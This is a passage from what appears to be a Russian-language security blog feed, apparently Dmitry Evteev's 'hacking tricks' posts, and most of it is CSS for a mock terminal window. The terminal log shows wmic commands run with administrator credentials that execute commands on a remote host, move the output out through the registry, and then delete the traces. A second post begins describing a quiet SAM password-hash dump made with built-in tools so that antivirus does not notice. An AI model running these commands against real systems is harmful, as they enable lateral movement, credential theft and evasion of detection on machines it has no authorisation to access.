   background: -moz-linear-gradient(top,  #f41b16 0%, #fc7471 100%); /* FF3.6+ */
   background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f41b16), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
   background: -webkit-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
   background: -o-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Opera 11.10+ */
   background: -ms-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* IE10+ */
   background: linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* W3C */   
}
.red:active{
     
    background: #972f2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #972f2e 0%, #fc7471 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#972f2e), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* IE10+ */
    background: linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* W3C */    
}
.red .shine{    
    position: relative;
    top: -23px;
    left: 5px;  
}
.red .glow{
    position: relative;
    top: -22px;
}
.red .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #9b3a36;
    z-index: 50;
    opacity: 0;
}
/*--YELLOW--*/
.yellow{
    background: #f4a316; /* Old browsers */
    background: -moz-linear-gradient(left,  #f4a316 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f4a316), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* W3C */  
    margin:0px 7px;
}
.yellow:active{
    background: #ae4f1e; /* Old browsers */
    background: -moz-linear-gradient(top,  #ae4f1e 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ae4f1e), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* W3C */    
}
.yellow .shine{ 
    position: relative;
    top: -23px;
    left: 5px;  
}
.yellow .glow{
    position: relative;
    top: -22px;
}


.yellow .glyph{
    position: relative;
    top: -7px;
    left: 4px;
    font-size: 24px;
    color: #854322;
    z-index: 50;
    opacity: 0;
    -webkit-transform: scaleY(1.5) scaleX(1.3);
}

/*--GREEN--*/
.green{
    
    background: #4cae2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #4cae2e 0%, #dafc71 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4cae2e), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* IE10+ */
    background: linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* W3C */
    
}
.green:active{
  background: #48752b; /* Old browsers */
  background: -moz-linear-gradient(top,  #48752b 0%, #dafc71 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#48752b), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* IE10+ */
  background: linear-gradient(top,  #48752b 0%,#dafc71 100%); /* W3C */
  
}
.green .shine{  
    position: relative;
    top: -22px;
    left: 5px; 
}
.green .glow{
    position: relative;
    top: -22px;
}
.green .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #25571d;
    z-index: 50;
    opacity: 0;
}

/* Horrible to do this for firefox */
@-moz-document url-prefix() {
  
  .red .glyph {
      position: relative;
      top: -4px;
  }  
  .yellow .glyph {
      top: -4px;
      left: 3px;
  }
    
  .green .glyph{
      position: relative;
      top: -4px;
  }
  
}

/*-----TITLE-----*/
#title{
    float: left; 
    position: relative;
    top:4px;
    width:40%;
    left: 30%;
    font-family: "Myriad Pro", sans-serif; 
    font-size: 14px; 
    text-shadow: 0px 1px 0px rgba(255,255,255,0.5);
    line-height: 14px; 
}
.folder{
    float: left;
    margin-right:5px;
}
.folder .tab{
    width:4px;
    height:2px;
    background:#a4c5da;
    border:1px solid #728ea3;
    border-bottom: none;
    border-radius:2px 2px 0px 0px;
    -webkit-box-shadow:0px -1px 0px #99b5c7 inset;
    margin-left: 1px;
    z-index: 5000;
    margin-bottom: -1px; 
}
.folder .body{
    width: 14px;
    height: 10px;
    border:1px solid #6e8ba1;
    
    background: #b8cfe0; /* Old browsers */
    background: -moz-linear-gradient(top,  #b8cfe0 0%, #86adc8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#b8cfe0), color-stop(100%,#86adc8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* IE10+ */
    background: linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* W3C */    
    
    z-index: -50;
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
}


#nav{
    margin: 1px 8px;
    float: left;
}
#view{
    margin: 2px 0 0 110px;
    display: inline-block;
}

.control_box{
    height:20px;
    border-radius: 3px;
    border: 1px solid #555;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #fefefe),color-stop(0, #b8b8b8));
    box-shadow:0px 1px 0px rgba(255,255,255,0.25);
}
.control_box .control{
    height:20px;
    border-right: 1px solid #2e2e2e;
    float: left;
    text-align: center; 
    width: 27px; 
}
.control:last-child{
    border-right: 0px solid !important;
}
.control:active{ 
    background: #b0afb0; 
    -webkit-box-shadow:0px 0px 4px #000 inset;
}
.active{
    background: #707070 !important;
    -webkit-box-shadow:0px 3px 4px rgba(0,0,0,0.6) inset !important;
}


#body {
    font-family: Andale Mono, monospace;  line-height: 1em;
    font-size:13px;
    float: left;
    width: 100%;
    min-height:130px;
    background:#000;
    padding:10px;
    line-height:1.5em;
}
#body p { 
   color: #63de00!important; 
}

@keyframes blink
{
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}

@-webkit-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
@-moz-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
.cursor {
  background:#63de00; 
  display:inline-block;
  width:11px;
  height:19px;
  margin-bottom:-3px;
}
#body:hover .cursor {
    -webkit-animation-name: blink;
    -webkit-animation-duration: 1.5s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blink;
    -moz-animation-duration: 1.5s;
    -moz-animation-iteration-count: infinite;
}
  
#body p::-webkit-selection  {
    background:#0b209e;
}
#body p::selection { background:#0b209e; }
#body p::-moz-selection { background:#0b209e; }

#body p {
  margin-top:5px;
  margin-bottom:5px;
  font-size:13px;
}

#content{
    float: left; 
    margin-top: 1px;
}
#foot{
    height: 23px;
    width: 100%;
    float: left;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #cbcbcb),color-stop(0, #a7a7a7));
    border-top:1px solid #515151;
    border-radius:0 0 5px 5px;
}
#foot .handle{
    width: 11px;
    height: 11px;
    float: right;
    margin: 6px;
    overflow: hidden;
}
.handle .grip{
    -webkit-transform: rotate(45deg) scaley(3);
    margin: 2px 0 0 2px;
    color: #646464;
    text-shadow: 1px 1px 0 #c6c6c6;
    font-size: 14px;
}

.icon{
    width: 86px; 
    height: 100px;
    margin: 20px; 
    float: left;
    font-family: "Myriad Pro", sans-serif; 
    text-align: center; 
    font-size: 12px;
}
.icon .frame{
    width: 82px;
    height: 82px; 
    border-radius: 5px;
    border: 2px solid transparent; 
}
.icon .name{
    color: #000;
    padding-top: 3px; 
    border-radius:15px;
    width: 55px;
    margin: 5px 0 0 15px;
}
.icon .folder{
    margin:15px 0 0 6px;
}
&lt;/style&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;C:\&amp;gt;&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;C:\&amp;gt;net use \\RHOST\C$&lt;br /&gt;
Системная ошибка 67.&lt;br /&gt;
Не найдено сетевое имя.&lt;br /&gt;
&lt;br /&gt;
C:\&amp;gt;wmic /node:RHOST /user:administrator /password:password process call create "cmd.exe /c ipconfig &amp;gt; C:\Windows\Temp\cmd.out"&lt;br /&gt;
Executing (Win32_Process)-&amp;gt;Create()&lt;br /&gt;
Method execution successful.&lt;br /&gt;
Out Parameters:&lt;br /&gt;
instance of __PARAMETERS&lt;br /&gt;
{&lt;br /&gt;
ProcessId = 2648;&lt;br /&gt;
ReturnValue = 0;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
C:\&amp;gt;wmic /node:RHOST /user:administrator /password:password process call create "cmd.exe /c for /F \"tokens=*\" %A in (C:\Windows\Temp\cmd.out) do @reg ADD HKLM\Software\temp /f /v \"%A\" /t REG_SZ /d \"\""&lt;br /&gt;
Executing (Win32_Process)-&amp;gt;Create()&lt;br /&gt;
Method execution successful.&lt;br /&gt;
Out Parameters:&lt;br /&gt;
instance of __PARAMETERS&lt;br /&gt;
{&lt;br /&gt;
ProcessId = 2760;&lt;br /&gt;
ReturnValue = 0;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
C:\&amp;gt;Wmic /node:RHOST /user:administrator /password:password /namespace:\\root\default class stdregprov call EnumValues ^&amp;amp;h80000002,"SOFTWARE\temp"&lt;br /&gt;
Executing (stdregprov)-&amp;gt;EnumValues()&lt;br /&gt;
Method execution successful.&lt;br /&gt;
Out Parameters:&lt;br /&gt;
instance of __PARAMETERS&lt;br /&gt;
{&lt;br /&gt;
ReturnValue = 0;&lt;br /&gt;
sNames = {"Настройка протокола IP для Windows", "Ethernet adapter Ethern&lt;br /&gt;
et0:", "DNS-суффикс подключения . . . . . :", "Локальный IPv6-адрес канала . . .&lt;br /&gt;
: fe80::b0ae:a410:4089:21f5%12", "IPv4-адрес. . . . . . . . . . . . : 172.30.0.&lt;br /&gt;
2", "Маска подсети . . . . . . . . . . : 255.255.0.0", "Основной шлюз. . . . . .&lt;br /&gt;
. . . :", "Туннельный адаптер Teredo Tunneling Pseudo-Interface:", "Состояние с&lt;br /&gt;
реды. . . . . . . . : Среда передачи недоступна.", "Туннельный адаптер isatap.{8&lt;br /&gt;
6A92B92-E3DE-456B-9EDB-24B724A73E3E}:"};&lt;br /&gt;
Types = {1, 1, 1, 1, 1, 1, 1, 1, 1, 1};&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
C:\&amp;gt;wmic /node:RHOST /user:administrator /password:password process call create "cmd /c del /Q /F C:\Windows\Temp\cmd.out &amp;amp;&amp;amp; reg delete HKLM\Software\temp /f"&lt;br /&gt;
Executing (Win32_Process)-&amp;gt;Create()&lt;br /&gt;
Method execution successful.&lt;br /&gt;
Out Parameters:&lt;br /&gt;
instance of __PARAMETERS&lt;br /&gt;
{&lt;br /&gt;
ProcessId = 3716;&lt;br /&gt;
ReturnValue = 0;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
C:\&amp;gt;&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5_RF2hz29wz9puBQKvmu_A3uB7yFr-noFUePzIMnALR6o5zZbQiZZmJapWjjeQuC4QUfqXML1O1gwGntiquAO9vsnUN8zni7Pd2MKvHF01EIs8uuut5Fk939gZ5jhTRy9G07Ai1t6gR4/s3200/Exec_via_RPC_with_output.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5_RF2hz29wz9puBQKvmu_A3uB7yFr-noFUePzIMnALR6o5zZbQiZZmJapWjjeQuC4QUfqXML1O1gwGntiquAO9vsnUN8zni7Pd2MKvHF01EIs8uuut5Fk939gZ5jhTRy9G07Ai1t6gR4/s3200/Exec_via_RPC_with_output.png" height="511" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX4zFYWYsnBYSd5BZLC-G7v2Ak1bnZP_oI6mtWkgLL6qs4pF2oeKpnl8B_Ih2DX3PBDQi99twJEkyQgGvIyWU9b5m2GUS9MWucVb35zlsb1a7ck7Wo8a-WwsPb77XC3UvGjjdp3yJ02u0/s72-c/wmic.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[hacking tricks] Тихий pwdump</title><link>http://devteev.blogspot.com/2014/03/hacking-tricks-pwdump.html</link><category>hash</category><category>Microsoft</category><category>pwdump</category><category>tools</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 26 Mar 2014 02:49:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6426567263644738774</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Каждый раз, когда необходимо выдрать локальную базу SAM с компутера под управлением окон, у тулов серии &lt;a href="http://www.tarasco.org/security/pwdump_7/" target="_blank"&gt;pwdump&lt;/a&gt;&amp;nbsp;начинается истерика в предвестии реакции используемого авера на удаленной машине(( И этот процесс все чаще начинает походить на танцы с бубном вокруг когда-то &lt;a href="https://docs.google.com/spreadsheet/ccc?key=0Ak-eXPencMnydGhwR1VvamhlNEljVHlJdVkxZ2RIaWc&amp;amp;usp=drive_web#gid=0" target="_blank"&gt;девственного софта&lt;/a&gt;, не побывавшего в лаборатории дяди ммм... вирусного аналитика) Поэтому, дабы сэкономить время и нервы (юзверей) приходится отказываться от стороннего ПО и прибегать к использованию встроенных средств операционной системы :)&lt;br /&gt;
&lt;br /&gt;
Про &lt;a href="http://devteev.blogspot.ru/2013/09/windows-shadow-hack.html" target="_blank"&gt;скрытые копии &lt;/a&gt;я уже говорил ранее. Этот способ отлично подходит для перетягивания содержимого адешечки. А вот для локальной базы SAM существуют и другие не менее простые варианты. Один из них представлен ниже.&lt;/div&gt;&lt;style&gt;
/* http://cssdeck.com/labs/pure-css-osx-terminal */
body { background:#d2dfe6;
color: #444;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
line-height: 1.5em;
}

/* FINDER WINDOW */

#window{
    width: 90%;
    margin-top:40px;
 margin-left: auto;
 margin-right: auto;
    margin-bottom:40px;
    min-width: 500px; 
    background: #fff;
    border-radius: 5px;
    -webkit-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    /*-webkit-transition:all 0.5s; */
    overflow: hidden; 
}

/* TOP BAR */
#topbar{
    width: 100%;
    height: 21px;
    font-size: 16px;
    font-family: "Myriad Pro", sans-serif;
    text-shadow:0px 1px 0px rgba(255,255,255,0.25);
    -webkit-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
    -moz-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
   
    
}
#topbar ul li {
    float: left; 
    padding:0 10px;
    height: 21px;
    line-height: 24px;
}
#topbar ul li:first-child{
    font-size: 20px;
    line-height: 26px;
    margin-left: 5px;
}
#topbar ul li:nth-child(2){
    font-family: "Myriad-Semi", sans-serif;
}
#topbar ul li:active{
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #4a82ff),color-stop(0, #0052fc));
    color: #fff;
    text-shadow: none;
}
#toolbar{
    width: 100%; 
    height: 25px;
    background: grey;
    border-radius:5px 5px 0 0;

    background: #cfcfcf; /* Old browsers */
    background: -moz-linear-gradient(top,  #cfcfcf 0%, #a8a8a8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#cfcfcf), color-stop(100%,#a8a8a8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* IE10+ */
    background: linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* W3C */
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;        
    
}
#toolbar .top{
    float: left; 
    width: 100%; 
    height: 23px;
}
#toolbar .bottom{
    float: left; 
    width: 100%; 
    height: 30px;
}

/*-----TRAFFIC LIGHTS-----*/
#toolbar #lights{
    float: left;
    position:relative;
    top:4px;
    left:7px; 
}
.light{
    float:left;
    width:14px;
    height:14px;
    border-radius:14px;
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    overflow: hidden;
}
#lights:hover .glyph{
    opacity: 1;
    cursor:default;
    
}
.light .shine{
     width: 4px;
     height:3px;
     border-radius:10px;
     /*background-image: -webkit-gradient(radial, center center, 0, center center, 3, from(rgba(255,255,255,1)), to(rgba(255,255,255,0)));*/
     background: -moz-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%, rgba(255,255,255,0) 100%); /* FF3.6+ */    
     background-image: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,0))); /* Chrome,Safari4+ */
     background: -webkit-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Chrome10+,Safari5.1+ */
     background: -o-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Opera 12+ */
     background: -ms-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* IE10+ */
     background: radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* W3C */
     
}
.light .glow{
    width:14px;
    height:8px; 
    background-image: -webkit-gradient(radial, center bottom, 0, center center, 5, from(rgba(255,255,255,0.75)), to(rgba(255,255,255,0)));
    background: 0px 0px -moz-radial-gradient(bottom, cover,  rgba(255,255,255,0.70) 0%, rgba(255,255,255,0) 80%); /* FF3.6+ */
   
}
/*--RED--*/
.red{
   background: #f41b16; /* Old browsers */
   background: -moz-linear-gradient(top,  #f41b16 0%, #fc7471 100%); /* FF3.6+ */
   background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f41b16), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
   background: -webkit-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
   background: -o-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Opera 11.10+ */
   background: -ms-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* IE10+ */
   background: linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* W3C */   
}
.red:active{
     
    background: #972f2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #972f2e 0%, #fc7471 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#972f2e), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* IE10+ */
    background: linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* W3C */    
}
.red .shine{    
    position: relative;
    top: -23px;
    left: 5px;  
}
.red .glow{
    position: relative;
    top: -22px;
}
.red .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #9b3a36;
    z-index: 50;
    opacity: 0;
}
/*--YELLOW--*/
.yellow{
    background: #f4a316; /* Old browsers */
    background: -moz-linear-gradient(left,  #f4a316 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f4a316), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* W3C */  
    margin:0px 7px;
}
.yellow:active{
    background: #ae4f1e; /* Old browsers */
    background: -moz-linear-gradient(top,  #ae4f1e 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ae4f1e), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* W3C */    
}
.yellow .shine{ 
    position: relative;
    top: -23px;
    left: 5px;  
}
.yellow .glow{
    position: relative;
    top: -22px;
}


.yellow .glyph{
    position: relative;
    top: -7px;
    left: 4px;
    font-size: 24px;
    color: #854322;
    z-index: 50;
    opacity: 0;
    -webkit-transform: scaleY(1.5) scaleX(1.3);
}

/*--GREEN--*/
.green{
    
    background: #4cae2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #4cae2e 0%, #dafc71 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4cae2e), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* IE10+ */
    background: linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* W3C */
    
}
.green:active{
  background: #48752b; /* Old browsers */
  background: -moz-linear-gradient(top,  #48752b 0%, #dafc71 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#48752b), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* IE10+ */
  background: linear-gradient(top,  #48752b 0%,#dafc71 100%); /* W3C */
  
}
.green .shine{  
    position: relative;
    top: -22px;
    left: 5px; 
}
.green .glow{
    position: relative;
    top: -22px;
}
.green .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #25571d;
    z-index: 50;
    opacity: 0;
}

/* Horrible to do this for firefox */
@-moz-document url-prefix() {
  
  .red .glyph {
      position: relative;
      top: -4px;
  }  
  .yellow .glyph {
      top: -4px;
      left: 3px;
  }
    
  .green .glyph{
      position: relative;
      top: -4px;
  }
  
}

/*-----TITLE-----*/
#title{
    float: left; 
    position: relative;
    top:4px;
    width:40%;
    left: 30%;
    font-family: "Myriad Pro", sans-serif; 
    font-size: 14px; 
    text-shadow: 0px 1px 0px rgba(255,255,255,0.5);
    line-height: 14px; 
}
.folder{
    float: left;
    margin-right:5px;
}
.folder .tab{
    width:4px;
    height:2px;
    background:#a4c5da;
    border:1px solid #728ea3;
    border-bottom: none;
    border-radius:2px 2px 0px 0px;
    -webkit-box-shadow:0px -1px 0px #99b5c7 inset;
    margin-left: 1px;
    z-index: 5000;
    margin-bottom: -1px; 
}
.folder .body{
    width: 14px;
    height: 10px;
    border:1px solid #6e8ba1;
    
    background: #b8cfe0; /* Old browsers */
    background: -moz-linear-gradient(top,  #b8cfe0 0%, #86adc8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#b8cfe0), color-stop(100%,#86adc8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* IE10+ */
    background: linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* W3C */    
    
    z-index: -50;
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
}


#nav{
    margin: 1px 8px;
    float: left;
}
#view{
    margin: 2px 0 0 110px;
    display: inline-block;
}

.control_box{
    height:20px;
    border-radius: 3px;
    border: 1px solid #555;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #fefefe),color-stop(0, #b8b8b8));
    box-shadow:0px 1px 0px rgba(255,255,255,0.25);
}
.control_box .control{
    height:20px;
    border-right: 1px solid #2e2e2e;
    float: left;
    text-align: center; 
    width: 27px; 
}
.control:last-child{
    border-right: 0px solid !important;
}
.control:active{ 
    background: #b0afb0; 
    -webkit-box-shadow:0px 0px 4px #000 inset;
}
.active{
    background: #707070 !important;
    -webkit-box-shadow:0px 3px 4px rgba(0,0,0,0.6) inset !important;
}


#body {
    font-family: Andale Mono, monospace;  line-height: 1em;
    font-size:13px;
    float: left;
    width: 100%;
    min-height:130px;
    background:#000;
    padding:10px;
    line-height:1.5em;
}
#body p { 
   color: #63de00!important; 
}

@keyframes blink
{
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}

@-webkit-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
@-moz-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
.cursor {
  background:#63de00; 
  display:inline-block;
  width:11px;
  height:19px;
